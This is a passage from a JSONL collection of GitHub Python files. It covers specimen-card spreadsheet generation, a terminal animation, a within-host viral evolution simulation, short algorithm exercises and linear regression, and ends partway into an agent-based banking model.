control\"\"\"\n if self.params.name == \"random\":\n action = random.choice(list(self.action_mapping.values())[1:4])\n elif self.params.name == \"forward_right\":\n action = self._act_forward_right(obs)\n elif self.params.name == \"frontier\":\n action = self._act_frontier(obs)\n else:\n raise ValueError\n return {\"action\": action}\n\n","repo_name":"yashkant/housekeep","sub_path":"cos_eor/policy/explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"32406665226","text":"# -*- coding:utf-8 -*-\n# author:keyoung\n# email:keyoung.lau@qq.com\n# date:2019-10-11\ndef draw_grid(amount_card, read_file, savefile_name):\n from readList import read_csv_to_list\n import xlsxwriter\n\n workbook = xlsxwriter.Workbook(savefile_name) # 新建excel表\n worksheet = workbook.add_worksheet('sheet1') # 新建sheet(sheet的名称为\"sheet1\")\n\n # 设置右对齐格式\n align_right = workbook.add_format()\n align_right.set_align(\"right\")\n align_right.set_bottom(1)\n align_right.set_bottom_color(\"black\")\n\n # 设置单元格格式1\n border1 = workbook.add_format()\n border1.set_bottom(1)\n border1.set_bottom_color(\"black\")\n\n # 设置单元格格式2\n border2 = workbook.add_format()\n border2.set_left(2)\n border2.set_left_color(\"black\")\n border2.set_right(2)\n border2.set_right_color(\"black\")\n border2.set_top(2)\n border2.set_top_color(\"black\")\n border2.set_bottom(1)\n border2.set_bottom_color(\"black\")\n border2.set_valign(\"vcenter\")\n border2.set_align(\"center\")\n\n # 设置单元格格式3\n border3 = workbook.add_format()\n border3.set_left(1)\n border3.set_left_color(\"black\")\n border3.set_right(1)\n border3.set_right_color(\"black\")\n border3.set_top(1)\n border3.set_top_color(\"black\")\n border3.set_bottom(1)\n border3.set_bottom_color(\"black\")\n\n # 设置一个9号字体\n border3_with_smaller_font = workbook.add_format()\n border3_with_smaller_font.set_left(1)\n border3_with_smaller_font.set_left_color(\"black\")\n border3_with_smaller_font.set_right(1)\n border3_with_smaller_font.set_right_color(\"black\")\n border3_with_smaller_font.set_top(1)\n border3_with_smaller_font.set_top_color(\"black\")\n border3_with_smaller_font.set_bottom(1)\n border3_with_smaller_font.set_bottom_color(\"black\")\n border3_with_smaller_font.set_font_size(9)\n\n # 设置一个8号字体\n border3_with_very_smaller_font = workbook.add_format()\n border3_with_very_smaller_font.set_left(1)\n border3_with_very_smaller_font.set_left_color(\"black\")\n border3_with_very_smaller_font.set_right(1)\n border3_with_very_smaller_font.set_right_color(\"black\")\n border3_with_very_smaller_font.set_top(1)\n border3_with_very_smaller_font.set_top_color(\"black\")\n border3_with_very_smaller_font.set_bottom(1)\n border3_with_very_smaller_font.set_bottom_color(\"black\")\n border3_with_very_smaller_font.set_font_size(8)\n\n # 设置一个居中格式\n border3_with_center = workbook.add_format()\n border3_with_center.set_left(1)\n border3_with_center.set_left_color(\"black\")\n border3_with_center.set_right(1)\n border3_with_center.set_right_color(\"black\")\n border3_with_center.set_top(1)\n border3_with_center.set_top_color(\"black\")\n border3_with_center.set_bottom(1)\n border3_with_center.set_bottom_color(\"black\")\n border3_with_center.set_align(\"center\")\n\n # rewrite drawGrid\n rownum = 0\n colnum = 0\n print(\"绘制卡片中......\")\n\n # 这里稍微处理一下amount_card,使得画卡片的时候永远是偶数张卡片,方便打印控制,而且不会使处理数据的时候混乱\n if amount_card % 2 == 0:\n draw_card_amount = amount_card\n else:\n draw_card_amount = amount_card + 1\n\n for page in range(draw_card_amount):\n if rownum >= (amount_card * 18) / 2: # 一个格子需要18行\n # 这是控制换列\n colnum = 5\n rownum = 0\n # 写前三行\n worksheet.write(rownum, colnum, \"科 名\")\n worksheet.write(rownum + 1, colnum, \"学 名\")\n worksheet.write(rownum + 2, colnum, \"中 名\")\n\n worksheet.write(rownum, colnum + 1, None, border1)\n worksheet.write(rownum + 1, colnum + 1, None, border1)\n worksheet.write(rownum + 2, colnum + 1, None, border1)\n\n worksheet.write(rownum + 4, colnum, \"登记号\", border2)\n worksheet.write(rownum + 4, colnum + 1, \"采集地点\", border2)\n worksheet.write(rownum + 4, colnum + 2, \"采集日期\", border2)\n worksheet.write(rownum + 4, colnum + 3, \"标本概况\", border2)\n\n worksheet.write(rownum + 9, colnum, \"登记号\", border2)\n worksheet.write(rownum + 9, colnum + 1, \"采集地点\", border2)\n worksheet.write(rownum + 9, colnum + 2, \"采集日期\", border2)\n worksheet.write(rownum + 9, colnum + 3, \"标本概况\", border2)\n\n # 写个编号吧,如果不需要可以用随时注释掉\n worksheet.write(rownum, colnum + 3, \"第{}张\".format(page + 1), align_right)\n\n # 设置样式\n worksheet.set_column(0, 0, 7.22) # 设置A列宽度\n worksheet.set_column(5, 5, 7.22) # 设置F列宽度\n worksheet.set_column(2, 2, 11.22) # 设置C列宽度\n worksheet.set_column(7, 7, 11.22) # 设置H列宽度\n worksheet.set_column(1, 1, 14.22) # 设置B列宽度\n worksheet.set_column(6, 6, 14.22) # 设置G列宽度\n worksheet.set_column(3, 3, 25.22) # 设置D列宽度\n worksheet.set_column(8, 8, 25.22) # 设置I列宽度\n worksheet.set_column(4, 4, 5.11) # 设置E列宽度,为了裁纸的时候舒服一点\n\n # 调整行高\n worksheet.set_row(rownum, 25.0, None)\n worksheet.set_row(rownum + 1, 25.0, None)\n worksheet.set_row(rownum + 2, 25.0, None)\n worksheet.set_row(rownum + 4, 20.6, None)\n worksheet.set_row(rownum + 5, 20.6, None)\n worksheet.set_row(rownum + 6, 20.6, None)\n worksheet.set_row(rownum + 7, 20.6, None)\n\n worksheet.set_row(rownum + 9, 20.6, None)\n worksheet.set_row(rownum + 10, 20.6, None)\n worksheet.set_row(rownum + 11, 20.6, None)\n worksheet.set_row(rownum + 12, 20.6, None)\n worksheet.set_row(rownum + 13, 20.6, None)\n worksheet.set_row(rownum + 14, 20.6, None)\n worksheet.set_row(rownum + 15, 20.6, None)\n worksheet.set_row(rownum + 16, 20.6, None)\n worksheet.set_row(rownum + 17, 118.7, None)\n\n worksheet.write_blank(rownum, colnum + 2, \"\", border1)\n worksheet.write_blank(rownum + 1, colnum + 2, \"\", border1)\n worksheet.write_blank(rownum + 1, colnum + 3, \"\", border1)\n worksheet.write_blank(rownum + 2, colnum + 2, \"\", border1)\n worksheet.write_blank(rownum + 2, colnum + 3, \"\", border1)\n\n for j in range(5, 8):\n for q in range(0, 4):\n worksheet.write_blank(rownum + j, colnum + q, \"\", border3)\n\n for j in range(10, 17):\n for q in range(0, 4):\n worksheet.write_blank(rownum + j, colnum + q, \"\", border3)\n rownum = rownum + 18\n\n # 这里定义一个内部函数,用来把学名的种名属名(specific_generic_name)和作者(author)分离出来\n def split_scientific_name(scientific_name: str):\n import re\n global specific_generic_name, author_name\n specific_generic_name = re.findall(\"(^[A-Z].*? .*?) .*\", scientific_name)\n if specific_generic_name:\n specific_generic_name = specific_generic_name[0]\n author_name = scientific_name[len(specific_generic_name) + 1:]\n if len(author_name) == 0:\n author_name = \" \"\n return specific_generic_name, author_name\n\n # rewrite handleListDate(重写老版的handleListDate)\n print(\"处理数据中......\")\n lst = read_csv_to_list(read_file)\n amount_of_lst = len(lst)\n current_row = lst.pop() # 抽出数据\n\n italic = workbook.add_format({'italic': True})\n rownum = 0 # 行号\n colnum = 0 # 列号\n\n # 这里可以选者两种对比方式,7是选择学名,感觉科学一点\n check_name = current_row[7]\n # 先把第一个给填了,等会再来对比分析\n\n generic_name, author = split_scientific_name(current_row[7])\n\n worksheet.write(rownum, colnum + 1, current_row[2], border1) # 写科名\n worksheet.write_rich_string(rownum + 1, colnum + 1, italic, f\"{generic_name} \", f\"{author}\", border1) # 写学名\n worksheet.write(rownum + 2, colnum + 1, current_row[1], border1) # 写中文名\n\n worksheet.write(rownum + 5, colnum, current_row[0], border3) # 写登记号\n if len(current_row[10]) < 8:\n worksheet.write(rownum + 5, colnum + 1, current_row[10], border3) # 写采集地点\n else:\n worksheet.write(rownum + 5, colnum + 1, current_row[10], border3_with_smaller_font) # 写采集地点\n worksheet.write(rownum + 5, colnum + 2, current_row[13], border3_with_center) # 写采集日期\n if len(current_row[11] + \"采集 \" + current_row[12]) < 17:\n worksheet.write(rownum + 5, colnum + 3, current_row[11] + \"采集 \" + current_row[12], border3) # 写标本概况\n elif 17 <= len(current_row[11] + \"采集 \" + current_row[12]) < 24:\n worksheet.write(rownum + 5, colnum + 3, current_row[11] + \"采集 \" + current_row[12], border3_with_smaller_font) # 写标本概况\n else:\n worksheet.write(rownum + 5, colnum + 3, current_row[11] + \"采集 \" + current_row[12],\n border3_with_very_smaller_font) # 写标本概况\n\n # 第一条数据录完之后就要对比分析了\n row_counter = 1 # 设置一个行计数器\n\n while lst: # 当列表lst不为空,就不断抽取数据\n if rownum > (amount_card * 18) / 2: # 这个是控制换到另一边\n colnum = 5\n rownum = 0\n current_row = lst.pop() # 又抽取一条数据\n if current_row[7] == check_name:\n if row_counter == 3:\n # 因为要空一行,所以要多加一个判断\n row_counter = 5\n if row_counter > 11:\n # 大于这么多就准备换页了\n row_counter = 0\n rownum = rownum + 18\n if rownum >= (page * 9) + 1: # 这个数字应该还要计算一下,天灵灵地灵灵,保佑不出错\n rownum = 0\n colnum = 5\n generic_name, author = split_scientific_name(current_row[7])\n worksheet.write(rownum, colnum + 1, current_row[2], border1) # 写科名\n worksheet.write_rich_string(rownum + 1, colnum + 1, italic, f\"{generic_name} \", f\"{author}\", border1) # 写学名\n worksheet.write(rownum + 2, colnum + 1, current_row[1], border1) # 写中文名\n # 如果相等,意思就是同一种标本\n # 同一种标本就不用再写科名,学名和中文名了\n worksheet.write(rownum + 5 + row_counter, colnum, current_row[0], border3) # 写登记号\n if len(current_row[10]) < 8:\n worksheet.write(rownum + 5 + row_counter, colnum + 1, current_row[10], border3) # 写采集地点\n else:\n worksheet.write(rownum + 5 + row_counter, colnum + 1, current_row[10], border3_with_smaller_font) # 写采集地点\n worksheet.write(rownum + 5 + row_counter, colnum + 2, current_row[13], border3_with_center) # 写采集日期\n if len(current_row[11] + \"采集 \" + current_row[12]) < 17:\n worksheet.write(rownum + 5 + row_counter, colnum + 3, current_row[11] + \"采集 \" + current_row[12], border3) # 写标本概况\n elif 17 <= len(current_row[11] + \"采集 \" + current_row[12]) < 24:\n worksheet.write(rownum + 5 + row_counter, colnum + 3, current_row[11] + \"采集 \" + current_row[12],\n border3_with_smaller_font) # 写标本概况\n else:\n worksheet.write(rownum + 5 + row_counter, colnum + 3, current_row[11] + \"采集 \" + current_row[12],\n border3_with_very_smaller_font) # 写标本概况\n\n row_counter = row_counter + 1\n else:\n # 这是不等于的情况,意思就是不是同一种标本\n # 就要跳到下一页去了\n rownum = rownum + 18\n # 在前后不同的情况下也要考虑换列的情况\n if rownum >= (page * 9) + 1:\n rownum = 0\n colnum = 5\n\n generic_name, author = split_scientific_name(current_row[7])\n worksheet.write(rownum, colnum + 1, current_row[2], border1) # 写科名\n worksheet.write_rich_string(rownum + 1, colnum + 1, italic, f\"{generic_name} \", f\"{author}\", border1) # 写学名\n worksheet.write(rownum + 2, colnum + 1, current_row[1], border1) # 写中文名\n\n worksheet.write(rownum + 5, colnum, current_row[0], border3) # 写登记号\n if len(current_row[10]):\n worksheet.write(rownum + 5, colnum + 1, current_row[10], border3) # 写采集地点\n else:\n worksheet.write(rownum + 5, colnum + 1, current_row[10], border3_with_smaller_font) # 写采集地点\n worksheet.write(rownum + 5, colnum + 2, current_row[13], border3_with_center) # 写采集日期\n if len(current_row[11] + \"采集 \" + current_row[12]) < 17:\n worksheet.write(rownum + 5, colnum + 3, current_row[11] + \"采集 \" + current_row[12], border3) # 写标本概况\n elif 17 <= len(current_row[11] + \"采集 \" + current_row[12]) < 24:\n worksheet.write(rownum + 5, colnum + 3, current_row[11] + \"采集 \" + current_row[12], border3_with_smaller_font) # 写标本概况\n else:\n worksheet.write(rownum + 5, colnum + 3, current_row[11] + \"采集 \" + current_row[12],\n border3_with_very_smaller_font)\n\n # 再把check_name重新赋值��下\n check_name = current_row[7]\n row_counter = 1\n\n workbook.close()\n print(f\"数据处理完成,一共处理{amount_of_lst}条数据。\")\n print(f\"保存文件<{savefile_name}>。\")\n print(\"-\"*46)","repo_name":"KeyoungLau/py4insect-specimen","sub_path":"drawGrid.py","file_name":"drawGrid.py","file_ext":"py","file_size_in_byte":13869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"29003723945","text":"#!/usr/bin/env python3\n\n# Experiment Unicode vertical bars in a terminal\n\nfrom time import sleep\n\nfor y in range(10):\n for x in range(8):\n print(' ', chr(0x2588-x), '\\r', end='')\n sleep(0.05)\n for x in range(8):\n print(' ', chr(0x2581+x), '\\r', end='')\n sleep(0.05)\n","repo_name":"ebouaziz/miscripts","sub_path":"Python/term/ubar.py","file_name":"ubar.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4109672913","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport numpy as np \nimport pandas as pd\n\nimport multiprocessing as mp \nimport matplotlib as mpl \n\nimport matplotlib.pyplot as plt\nimport sys \nimport os\n\nfrom scipy.integrate import odeint\nfrom scipy.sparse import csr_matrix, lil_matrix, dok_matrix, vstack, issparse\nfrom scipy.stats import binom, poisson, multinomial\n\n\n# In[ ]:\n\n\n#parameters \n# 1 generation = entry to shedding \nhours_per_gen = 6 # McCrone, bioRxiv 2020\nR0 = 5 # Within-host R0 (Hadjichrysanthou et al., 2016)\nC_max = 4e8 # max number of cells that can be targeted (Hadjichrysanthouet al., 2016;)\nd = 2*(hours_per_gen/24) # per-capita virus decay rate per generation (clearance)\n\n# variables \nbottleneck = 1 # starting number of (V)irions \nr = 100 # branching factor (average number of virions produced by each cell)\ndays_to_analyze = 14\n\n# computed variables \ndays_to_analyze = 14\nhours_per_gen = 6\nT = int(days_to_analyze*24/hours_per_gen) # number of replication cycles \nt_vec = np.arange(T+1)\nbeta = (R0*d)/(C_max*r)\n\n\n# In[ ]:\n\n\n# Find number of viruses within host using within-host ODE\ndef within_host_ODE(x, t): \n c, v = x \n nc = beta*c*v\n dc = -nc\n dv = nc*r - d*v\n return dc, dv\n\n# initialize \nx_0 = C_max, bottleneck \ndef solve_path(t_vec, x_init=x_0):\n F = lambda x, t: within_host_ODE(x, t)\n c_path, v_path = odeint(F, x_init, t_vec).transpose() \n return c_path, v_path\n\nc_path, v_path = solve_path(t_vec)\nv_path = np.rint(v_path).astype('int64')\n\n\n# In[ ]:\n\n\ndef binomial_robust(NN, p, size=None):\n NNp = NN*p\n if NN > 20 and NNp < 5:\n return np.random.poisson(NNp, size)\n else:\n return np.random.binomial(NN, p, size)\n\ndef multinomial_robust(NN, p, size=None):\n if NN < 1000: \n return multinomial.rvs(NN, p)\n else: \n results = np.array([binomial_robust(NN, pi, size) for pi in p])\n last_entry = int(NN) - results[:-1].sum(0)\n while last_entry < 0: \n results = np.array([binomial_robust(NN, pi, size) for pi in p])\n last_entry = int(NN) - results[:-1].sum(0)\n return np.rollaxis(results, 0, results.ndim)\n\ndef generate_randint(N, high_lim_arr, low_lim=0): \n #print (high_lim_arr)\n if (high_lim_arr <= 0).any(): \n print (high_lim_arr)\n raise Exception\n \n result = np.random.randint(low=0, high=high_lim_arr)\n result_sum = result.sum()\n exit_counter = 0\n while result_sum == 0: \n result = np.random.randint(low=0, high=high_lim_arr)\n result_sum = result.sum()\n exit_counter += 1\n if exit_counter > 10: \n break \n \n if result_sum > 0: \n result = np.rint(N*(result/result_sum)).astype(np.int)\n \n xs = result.sum()-N\n #print (xs, '*')\n while (abs(xs) != 0): \n if abs(xs) < 5: \n rand_add = xs\n else: \n if xs < 0: \n rand_add = np.random.randint(low=xs, high=0)\n else: \n rand_add = np.random.randint(low=0, high=xs)\n \n result_idx = np.random.choice(np.arange(len(result)), 100 if len(result) >= 100 else np.int(0.9*len(result)), replace=False)\n np.random.shuffle(result_idx)\n for idx in result_idx: \n value = result[idx]\n if value - rand_add < high_lim_arr[idx] and value - rand_add >= 0: \n #print (value, rand_add)\n result[idx] = value - rand_add\n break \n \n xs = result.sum()-N\n #print (xs, \"**t\")\n return result\n\ndef remove_extinct_genotypes(g_dist, g_boolean):\n # remove extinct genotype \n extinct_g = np.where(g_dist<1)[0]\n if len(extinct_g) > 0: \n g_dist = g_dist[g_dist>0]\n mask = np.ones(g_boolean.shape[0], dtype=bool)\n mask[extinct_g] = False\n g_boolean = g_boolean[mask]\n return g_dist, g_boolean\n else: \n return g_dist, g_boolean\n \ndef combine_identical_genotypes(g_dist, g_boolean):\n\n indices = g_boolean.indices\n indptr = g_boolean.indptr\n \n mpos_to_g = [tuple(indices[indptr[g]:indptr[g+1]]) for g in np.arange(g_dist.size)]\n #print (\"step 1 done, {}\".format(len(mpos_to_g)))\n if len(mpos_to_g) == len(set(mpos_to_g)): \n return g_dist, g_boolean\n else: \n mpos_to_glist = {}\n for g, mpos in enumerate(mpos_to_g): \n #mpos_count = mpos_to_g.count(mpos)\n #if mpos_count > 1: \n try: \n mpos_to_glist[mpos].append(g)\n except:\n mpos_to_glist[mpos] = [g]\n \n discard_g = []\n for mpos, glist in mpos_to_glist.items(): \n if len(glist) > 1:\n discard_g += glist[1:]\n g_dist[glist[0]] += g_dist[glist[1:]].sum() \n \n mask = np.ones(g_dist.size, dtype=bool)\n mask[discard_g] = 0\n \n g_dist, g_boolean = g_dist[mask], g_boolean[mask]\n return g_dist, g_boolean\n\ndef add_mutations(g_dist, g_boolean, m_v, loci):\n g_mutate = generate_randint(m_v, g_dist) # randomly select individuals from genotype classes (index = genotype)\n g_dist -= g_mutate # remove mutated individuals from original genotype \n\n # convert csr g_boolean to lil \n g_boolean = g_boolean.tolil()\n # get genotype rows to copy \n abv0_g_boolean = g_boolean[np.where(g_mutate>0)[0]]\n abv0_g_mutate = g_mutate[g_mutate>0]\n\n #print (\"..reconstruct new genotype boolean array and add mutations..\")\n new_g_boolean_rows, new_g_boolean_cols = g_boolean.nonzero()\n new_g_boolean_rows = list(new_g_boolean_rows)\n new_g_boolean_cols = list(new_g_boolean_cols)\n\n new_g_rowcounter = g_boolean.shape[0]\n for g, nind_to_mutate in enumerate(abv0_g_mutate):\n existing_g_cols = list(abv0_g_boolean[g].nonzero()[-1])\n # random select locus to mutate for each individual with genotype\n indpos_to_mutate = np.random.choice(loci, size=nind_to_mutate, replace=True) \n for i in range(nind_to_mutate):\n # append to rows and cols\n new_pos_to_mutate = indpos_to_mutate[i]\n if new_pos_to_mutate in existing_g_cols: # back mutation \n new_g_boolean_cols += list(set(existing_g_cols)-set([new_pos_to_mutate]))\n new_g_boolean_rows += [new_g_rowcounter+i]*(len(existing_g_cols)-1)\n else: # forward mutation\n new_g_boolean_cols += existing_g_cols + [new_pos_to_mutate]\n new_g_boolean_rows += [new_g_rowcounter+i]*(len(existing_g_cols)+1)\n # update new_g_rowcounter\n new_g_rowcounter += nind_to_mutate\n\n # print (len(new_g_boolean_rows) == len(new_g_boolean_cols))\n # make new boolean array \n m, n = g_boolean.shape[0]+abv0_g_mutate.sum(), g_boolean.shape[-1]\n g_boolean = csr_matrix(([1]*len(new_g_boolean_rows), (new_g_boolean_rows, new_g_boolean_cols)), \n shape=(m, n), dtype=np.int8)\n\n #print (\"..reconstruct genotype distribution array..\")\n # concatenate old and new g dist and boolean \n g_dist = np.hstack([g_dist, np.ones(abv0_g_mutate.sum(), dtype=np.int)]) # concatenate \n\n #print (\"..remove extinct genotypes..\")\n # remove any extinct genotypes \n g_dist, g_boolean = remove_extinct_genotypes(g_dist, g_boolean)\n \n return g_dist, g_boolean\n\n\n# In[ ]:\n\n\ndef simulate(sim, abs_del_s, frac_neu_nonsyn, seed, syn_l=390, nonsyn_l=420, mu=3e-6, exp_s_dist=0, s_mode=1, N_arr=v_path, max_N=1e7, t_vec=t_vec, N0=bottleneck, sample_Nmax=5e3, verbose=0):\n \n np.random.seed(seed)\n \n L = syn_l + nonsyn_l # total length\n \n # make loci map \n if verbose > 0: \n print (\"initialise monoclonal population..\")\n all_loci = np.arange(L)\n syn_loci = np.random.choice(all_loci, syn_l, replace=False)\n nonsyn_loci = np.setdiff1d(all_loci, syn_loci)\n \n neu_nonsyn_loci = np.random.choice(nonsyn_loci, np.round(frac_neu_nonsyn*nonsyn_l).astype(np.int), replace=False)\n del_nonsyn_loci = np.setdiff1d(nonsyn_loci, neu_nonsyn_loci)\n print (len(neu_nonsyn_loci), len(del_nonsyn_loci))\n \n # make fitness array of mutant \n mut_fitness_arr = np.zeros(L) # first index = 0 \n if exp_s_dist > 0:\n mut_fitness_arr[del_nonsyn_loci] = s_mode*np.random.exponential(abs_del_s, size=len(del_nonsyn_loci)) # del_s\n else: \n mut_fitness_arr[del_nonsyn_loci] = s_mode*abs_del_s\n \n # initialise monoclonal population \n rate_arr = np.zeros((2, len(t_vec)-2))\n curr_g_dist = np.zeros(1) + N0 # distribution of genotypes\n curr_g_boolean = csr_matrix((N0, L), dtype=np.int8) # genotype boolean array (if < 0 = all WT)\n \n # expand monoclonal population \n N = max_N if N_arr[1] > max_N else N_arr[1] # hard upper limit on virion pop size\n # get fitness distribution of previous gen \n curr_f_dist = np.multiply(np.exp(1+curr_g_boolean.dot(mut_fitness_arr)), curr_g_dist)\n pop_f = curr_f_dist.sum() # fitness of population\n curr_f_dist = curr_f_dist/pop_f # normalize \n curr_g_dist = multinomial_robust(N, curr_f_dist) # resample based on fitness distribution to get new curr_g_dist\n \n for t in t_vec[1:-1]: \n \n # add synonymous mutations \n m_v = np.random.poisson(N*mu*syn_l) \n if m_v > 0:\n if verbose > 0:\n print (\"add synonymous mutations..%i\"%(m_v))\n curr_g_dist, curr_g_boolean = add_mutations(curr_g_dist, curr_g_boolean, m_v, syn_loci)\n if verbose > 0:\n print (\"combine identical genotypes..\")\n curr_g_dist, curr_g_boolean = combine_identical_genotypes(curr_g_dist, curr_g_boolean)\n \n # add nonsynonymous mutations \n if len(neu_nonsyn_loci) > 0:\n m_v = np.random.poisson(N*mu*len(neu_nonsyn_loci)) # randomly select m_v number of individuals to mutate \n if m_v > 0:\n if verbose > 0:\n print (\"add neutral nonsynonymous mutations..%i\"%(m_v))\n curr_g_dist, curr_g_boolean = add_mutations(curr_g_dist, curr_g_boolean, m_v, neu_nonsyn_loci)\n \n if verbose > 0:\n print (\"combine identical genotypes..\")\n curr_g_dist, curr_g_boolean = combine_identical_genotypes(curr_g_dist, curr_g_boolean)\n \n if len(del_nonsyn_loci) > 0:\n m_v = np.random.poisson(N*mu*len(del_nonsyn_loci)) \n if m_v > 0:\n if verbose > 0:\n print (\"add deleterious nonsynonymous mutations..%i\"%(m_v)) \n curr_g_dist, curr_g_boolean = add_mutations(curr_g_dist, curr_g_boolean, m_v, del_nonsyn_loci)\n \n if verbose > 0:\n print (\"combine identical genotypes..\")\n curr_g_dist, curr_g_boolean = combine_identical_genotypes(curr_g_dist, curr_g_boolean)\n \n # resampling \n N = max_N if N_arr[t+1] > max_N else N_arr[t+1] # hard upper limit on virion pop size\n if verbose > 0:\n print (\"{} ({:.2f} days), {:.2e} virions\".format(t, (t*hours_per_gen)/24, N), \"resampling..\")\n # get fitness distribution of previous gen \n curr_f_dist = np.multiply(np.exp(1+curr_g_boolean.dot(mut_fitness_arr)), curr_g_dist)\n pop_f = curr_f_dist.sum() # fitness of population\n curr_f_dist = curr_f_dist/pop_f # normalize \n # resample based on fitness distribution to get new curr_g_dist\n curr_g_dist = multinomial_robust(N, curr_f_dist)\n if verbose > 0:\n print (\"remove extinct genotypes..\")\n # remove extinct genotypes \n curr_g_dist, curr_g_boolean = remove_extinct_genotypes(curr_g_dist, curr_g_boolean)\n \n # compute evo rates \n sample_g_dist = multinomial_robust(sample_Nmax, curr_g_dist/curr_g_dist.sum())\n syn_r = curr_g_boolean[:,syn_loci].T.dot(sample_g_dist)/sample_g_dist.sum()\n nonsyn_r = curr_g_boolean[:,nonsyn_loci].T.dot(sample_g_dist)/sample_g_dist.sum()\n\n syn_r = syn_r.sum()/L/(1+((t+1)*hours_per_gen)/24)\n nonsyn_r = nonsyn_r.sum()/L/(1+((t+1)*hours_per_gen)/24)\n \n if ((t+1)*hours_per_gen)/24%1 == 0:\n print (sim, \"{:.2f} days\".format(((t+1)*hours_per_gen)/24), \"{:.4e}\".format(syn_r), \"{:.4e}\".format(nonsyn_r), \"{:.2f}\".format(nonsyn_r/syn_r))\n rate_arr[0,t-1] = syn_r\n rate_arr[1,t-1] = nonsyn_r\n return rate_arr \n#simulate(sim=0, abs_del_s=0.01, frac_neu_nonsyn=0., s_mode=-1, exp_s_dist=0, verbose=0)\n\n\n# In[ ]:\n\n\nabs_del_s = float(sys.argv[1])\nfrac_neu_nonsyn = float(sys.argv[2])\nsim_N = int(sys.argv[3])\nthreadnum = int(sys.argv[4])\n\n\n# In[ ]:\n\nif os.path.isdir(\"./sim_results\"): \n os.mkdir(\"./sim_results\")\n\nall_rate_arr = np.zeros((sim_N, 2, len(t_vec[1:])-1))\n\nnumpy_seeds = np.random.choice(np.arange(sim_N*100), sim_N, replace=False)\n\npool = mp.Pool(processes=threadnum)\nresults = [pool.apply_async(simulate, args=(sim, abs_del_s, frac_neu_nonsyn, numpy_seeds[sim],)) for sim in range(sim_N)]\nfor sim, p in enumerate(results): \n all_rate_arr[sim] = p.get()\npool.close()\n\nnp.savez(\"./sim_results/mean_pos_s{}_frac_neu_nonsyn{}.npz\".format(abs_del_s, frac_neu_nonsyn), all_rate_arr=all_rate_arr)\n\n","repo_name":"AMC-LAEB/Within_Host_H3vH1","sub_path":"simulations/WHDEL.py","file_name":"WHDEL.py","file_ext":"py","file_size_in_byte":13265,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"32044456814","text":"# 182p 예제 6-4 두 배열의 원소 교체\n# N개 원소, K번 바꿔치기, 배열 A B\n# 배열 A의 합이 최대가 되도록 교환, 합 출력\n\nn, k = map(int,input().split())\n\na = list(map(int,input().split()))\nb = list(map(int,input().split()))\n\na.sort()\nb.sort(reverse=True)\n\nsum_array = []\nfor i in range(k):\n a[i], b[i] = b[i], a[i]\n result = sum(a)\n sum_array.append(result)\n\nprint(max(sum_array))\n\n# 원소가 작은 경우에만 swap 하고 배열 합 출력\nfor i in range(k):\n if a[i] < b[i]:\n a[i], b[i] = b[i], a[i]\n else:\n break\n\nprint(sum(a))\n\n# 나는 k번 동안 모두 swap을 하고 배열의 합을 저장하는 리스트의 max를 출력\n# 두 번째 방법은 배열 A의 원소가 B의 원소보다 작을 때만 swap하여 합 최대화 후 sum(a) 출력","repo_name":"chogyejin/algorithm","sub_path":"chapter06-정렬/두배열의원소교체.py","file_name":"두배열의원소교체.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16694687274","text":"import sys\n\ndef part1():\n\tnums = [0] + sorted(list(map(int, [line for line in sys.stdin])))\n\tdiffs = [nums[i] - nums[i-1] for i in range(1, len(nums))]\n\tprint(diffs.count(1) * (diffs.count(3) + 1))\n\ndef part2():\n\tnums = [0] + sorted(list(map(int, [line for line in sys.stdin])))\n\tnums += [nums[-1] + 3]\n\tn = len(nums)\n\tdp = [0]*(n)\n\tdp[0] = 1\n\tfor i in range(1, n):\n\t\tfor j in range(max(0, i-3), i):\n\t\t\tif nums[j] + 3 >= nums[i]:\n\t\t\t\tdp[i] += dp[j]\n\tprint(dp[-1])\n\n\nif __name__ == \"__main__\":\n\t# part1()\n\tpart2()\n\t\n","repo_name":"mattagar6/AdventOfCode2020","sub_path":"day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72851840165","text":"import numpy as np\nx=np.array([1,2,3,4,5,])\ny=np.array([5,7,9,11,13])\nmi=bi=0\nlearning_rate =0.1\nn=len(x)\ncosts=0\nite=1000\nfor i in range(ite):\n yp = mi * x + bi\n md = (1/n)*sum(x*(yp-y))\n bd = (1/n)*sum(yp-y)\n mi = mi - learning_rate * md\n bi = bi - learning_rate * bd\n cost = (1/n) * sum([val**2 for val in (yp-y)])\n \nprint(\"slope =\",mi,\" cost =\",cost,\"const =\",bi) \n","repo_name":"frozhusain/basic_linear_and_logistic_regression","sub_path":"basic_linear_regression.py","file_name":"basic_linear_regression.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17228988612","text":"import numpy as np\nimport os\nimport agents\nimport sys\nimport time\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n\nclass Simulation:\n\n def __init__(self,\n time, # time simulation is ran for\n numberOfFirms,\n numberOfBanks,\n alpha=0.1, # mean of firms price\n varpf=0.4, # variance of firms price\n gamma=0.02, # interest rate parameter\n chi=5, # number of potential partners on credit market\n lambd=4, # intensity of choice\n adj=0.1, # leverage adjustment\n phi=3, # production function parameter\n beta=0.7, # production function parameter\n rCB=0.02, # central bank interest rate\n cB=0.01, # banks costs\n mode=None, # mode to run simulation\n growth=False, # if enabled add agents through every step\n seed=None,\n outputFolder=None\n ):\n self.time = int(time)\n self.numberOfFirms = int(numberOfFirms)\n self.numberOfBanks = int(numberOfBanks)\n self.alpha = float(alpha)\n self.varpf = float(varpf)\n self.gamma = float(gamma)\n self.chi = int(chi)\n self.lambd = float(lambd)\n self.adj = float(adj)\n self.phi = float(phi)\n self.beta = float(beta)\n self.rCB = float(rCB)\n self.cB = float(cB)\n self.bestFirm = 0\n\n self.mode = 